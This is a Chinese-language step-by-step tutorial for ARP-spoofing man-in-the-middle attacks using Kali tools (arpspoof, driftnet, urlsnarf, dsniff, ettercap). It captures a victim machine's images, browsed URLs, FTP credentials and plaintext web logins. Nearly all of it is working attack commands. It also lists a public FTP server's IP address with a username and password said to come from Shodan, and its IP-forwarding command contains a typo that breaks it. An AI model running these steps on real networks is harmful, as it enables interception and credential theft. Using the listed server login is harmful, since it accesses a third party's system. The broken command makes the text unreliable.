一、ARP欺骗原理
(略)
二、实战:使用arpspoof实施中间人攻击
1.临时开启路由转发
root@kali:~# echo 1 > /proc/sys/net/ipv4/ip_forword
2.对客户机Win7(IP192.168.112.101,网关192.168.112.2)实施欺骗
root@kali:~# arpspoof -t 192.168.112.101 -r 192.168.112.2
3.在客户机上查看arp -a
网关和Kali的MAC一样
三、实战:安全防御中间人攻击还原目标机访问的图片
root@kali:~# driftnet -i eth0
在客户机Win7上浏览一些图片
回到Kali上查看所嗅探到的图片
把嗅探的图片保存到/root/wgxy/的方法:
root@kali:~# mkdir wgxy
root@kali:~# driftnet -i eth0 -a -d wgxy -s
四、实战:利用中间人攻击抓取目标机访问的HTTP流量
root@kali:~# urlsnarf -i eth0
在客户机Win7上打开网页浏览一下
五、实战:利用中间人攻击抓取目标机提交的FTP密码
root@kali:~# dsniff -i eth0 -m
dsniff支持哪些协议:
root@kali:~# vim /usr/lib/x86_64-linux-gnu/dsniff.services
通过shoudan的开源渠道找到一台FTP服务器ftp://134.73.18.32,用户lch,密码wgxy
(或ftp://192.168.112.128)
dsniff会自动分析用户名和密码
六、实战:利用中间人攻击抓取目标机提交的HTTP明文密码
1.临时开启路由转发
root@kali:~# echo 1 > /proc/sys/net/ipv4/ip_forword
2.对客户机Win7(IP192.168.112.101,网关192.168.112.2)实施欺骗
root@kali:~# arpspoof -t 192.168.112.101 -r 192.168.112.2
3.开启http嗅探
root@kali:~# ettercap -Tq -i eth0
-T --Text use text only GUI使用纯文本图形用户界面
-q --quit do not display packet contents 不显示数据包内容
4.在Win7上打开网站
登录靶机http://192.168.112.100/DVWA-1.9/login.php
捕获到密码。

